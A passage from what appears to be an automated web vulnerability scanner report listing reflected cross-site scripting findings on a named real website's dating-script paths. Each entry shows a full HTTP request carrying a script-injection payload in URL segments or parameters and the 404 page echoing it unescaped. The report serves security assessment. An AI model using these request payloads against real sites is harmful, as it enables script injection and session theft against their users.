<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/search.phpa5792<script>alert(1)</script>529f76e6fc1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.249. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 2161d<a>34cbda975c2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search2161d<a>34cbda975c2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search2161d<a>34cbda975c2&opt=2 was not found on this server.</p>
...[SNIP]...

2.250. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 770cb<a>99e15a7902e was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...770cb<a>99e15a7902e&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...770cb<a>99e15a7902e&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.251. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6ea34<script>alert(1)</script>f7af7ff18fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&6ea34<script>alert(1)</script>f7af7ff18fa=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&6ea34<script>alert(1)</script>f7af7ff18fa=1 was not found on this server.</p>
...[SNIP]...

2.252. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d294d<a>ec3cbe13d67 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d294d<a>ec3cbe13d67 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d294d<a>ec3cbe13d67 was not found on this server.</p>
...[SNIP]...

2.253. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ff9cf<script>alert(1)</script>cc07335c40d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultff9cf<script>alert(1)</script>cc07335c40d/personals-dating/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultff9cf<script>alert(1)</script>cc07335c40d/personals-dating/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.254. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fd164<script>alert(1)</script>b5a17f9d9c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-datingfd164<script>alert(1)</script>b5a17f9d9c2/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-datingfd164<script>alert(1)</script>b5a17f9d9c2/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.255. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c4384<script>alert(1)</script>25ec5527d1b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themesc4384<script>alert(1)</script>25ec5527d1b/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themesc4384<script>alert(1)</script>25ec5527d1b/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.256. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97bef<script>alert(1)</script>a2a6267faa9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos97bef<script>alert(1)</script>a2a6267faa9/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos97bef<script>alert(1)</script>a2a6267faa9/images/review/ was not found on this server.</p>
...[SNIP]...

2.257. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fd8e6<script>alert(1)</script>f9a9dda122e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/imagesfd8e6<script>alert(1)</script>f9a9dda122e/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/imagesfd8e6<script>alert(1)</script>f9a9dda122e/review/ was not found on this server.</p>
...[SNIP]...

2.258. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f25ba<script>alert(1)</script>16db7c16bc6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/reviewf25ba<script>alert(1)</script>16db7c16bc6/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/reviewf25ba<script>alert(1)</script>16db7c16bc6/ was not found on this server.</p>
...[SNIP]...

2.259. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d06d5<script>alert(1)</script>968b538ec1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/review/?d06d5<script>alert(1)</script>968b538ec1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review/?d06d5<script>alert(1)</script>968b538ec1=1 was not found on this server.</p>
...[SNIP]...

2.260. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 34019<script>alert(1)</script>a32761d78db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult34019<script>alert(1)</script>a32761d78db/personals-dating/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult34019<script>alert(1)</script>a32761d78db/personals-dating/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.261. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cb958<script>alert(1)</script>b7e035dd44b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-datingcb958<script>alert(1)</script>b7e035dd44b/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-datingcb958<script>alert(1)</script>b7e035dd44b/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.262. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e258f<script>alert(1)</script>8a49e814fe0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themese258f<script>alert(1)</script>8a49e814fe0/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themese258f<script>alert(1)</script>8a49e814fe0/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.263. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f5c1<script>alert(1)</script>8f8f057f782 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos6f5c1<script>alert(1)</script>8f8f057f782/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos6f5c1<script>alert(1)</script>8f8f057f782/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.264. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8323c<script>alert(1)</script>d3d5a817fa1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images8323c<script>alert(1)</script>d3d5a817fa1/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images8323c<script>alert(1)</script>d3d5a817fa1/review/0.gif was not found on this server.</p>
...[SNIP]...

2.265. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1b3f1<script>alert(1)</script>6cb63beba06 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/review1b3f1<script>alert(1)</script>6cb63beba06/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review1b3f1<script>alert(1)</script>6cb63beba06/0.gif was not found on this server.</p>
...[SNIP]...

2.266. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d950e<script>alert(1)</script>19391641d1b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/review/0.gifd950e<script>alert(1)</script>19391641d1b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review/0.gifd950e<script>alert(1)</script>19391641d1b was not found on this server.</p>
...[SNIP]...

2.267. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/0.gif

Issue detail

